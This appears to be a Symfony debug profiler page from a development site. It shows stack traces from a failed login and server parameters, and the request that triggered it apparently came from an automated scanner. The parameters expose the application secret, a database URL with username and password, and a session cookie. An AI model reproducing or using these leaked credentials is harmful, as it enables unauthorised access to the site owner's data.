    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 78
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 268
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 217
    "function" => "handleAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 160
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 65
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 49
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 111
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 152
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Firewall\ContextListener:184
[
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/ContextListener.php"
    "line" => 184
    "function" => "remove"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 111
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\Security\Http\Firewall\ContextListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 152
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 142
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"a0d0b7bd79f60b391a8d45199146d986"
DATABASE_URL
"mysql://l99bs_fxtest:Fxtest23@l99bs.myd.infomaniak.com:3306/l99bs_fxtest?serverVersion=mariadb-10.8.3&charset=utf8"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"772"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
CONTEXT_DOCUMENT_ROOT
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/.config/apache/fxtest.tiga-sys.com/.fpm/"
CONTEXT_PREFIX
"/.fpm/"
DOCUMENT_ROOT
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_COOKIE
"PHPSESSID=8aacbbd90428ec4cb26db2433701fea7; sf_redirect=%7B%22token%22%3A%2282601a%22%2C%22route%22%3A%22app_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CAuth%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fclients%5C%2F03a78d1f94bda7d4a26f92be73c1ad77%5C%2Fsites%5C%2Ffxtest.tiga-sys.com%5C%2Ffx_change%5C%2Fsrc%5C%2FController%5C%2FAuth%5C%2FSecurityController.php%22%2C%22line%22%3A36%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"fxtest.tiga-sys.com"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_FORWARDED_PROTO
"https"
HTTP_X_NEXTJS_HTML_REQUEST_ID
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID
"b5dce965"
ORIG_PATH_INFO
"/index.php"
ORIG_PATH_TRANSLATED
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php"
ORIG_SCRIPT_FILENAME
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/.config/apache/fxtest.tiga-sys.com/.fpm/php5.external"
ORIG_SCRIPT_NAME
"/.fpm/php5.external"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
PHP_VERSION
"8.2"
QUERY_STRING
""
REDIRECT_HANDLER
"php5-fcgi"
REDIRECT_HTTPS
"on"
REDIRECT_PHP_VERSION
"8.2"
REDIRECT_REDIRECT_HTTPS
"on"
REDIRECT_REDIRECT_PHP_VERSION
"8.2"
REDIRECT_REDIRECT_SCRIPT_URI
"https://fxtest.tiga-sys.com/security/login"
REDIRECT_REDIRECT_SCRIPT_URL
"/security/login"
REDIRECT_REDIRECT_SSL_TLS_SNI
"fxtest.tiga-sys.com"
REDIRECT_REDIRECT_STATUS
"200"
REDIRECT_REDIRECT_UNIQUE_ID
"aTodi1vntyKVFcloVkz8-QAAAKc"
REDIRECT_SCRIPT_URI
"https://fxtest.tiga-sys.com/security/login"
REDIRECT_SCRIPT_URL
"/security/login"
REDIRECT_SSL_TLS_SNI
"fxtest.tiga-sys.com"
REDIRECT_STATUS
"200"
REDIRECT_UNIQUE_ID
"aTodi1vntyKVFcloVkz8-QAAAKc"
REDIRECT_URL
"/index.php"
REMOTE_ADDR
"3.27.60.58"
REMOTE_PORT
"47402"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1765416331
REQUEST_TIME_FLOAT
1765416331.1538
REQUEST_URI
"/security/login"
SCRIPT_FILENAME
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://fxtest.tiga-sys.com/security/login"
SCRIPT_URL
"/security/login"
SERVER_ADDR
"127.0.0.80"
SERVER_ADMIN
"webmaster@tiga-sys.com"
SERVER_NAME
"fxtest.tiga-sys.com"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SSL_TLS_SNI
"fxtest.tiga-sys.com"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL"
TEMP
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/tmp"
TMP
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/tmp"
TMPDIR
"/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/tmp"
UNIQUE_ID
"aTodi1vntyKVFcloVkz8-QAAAKc"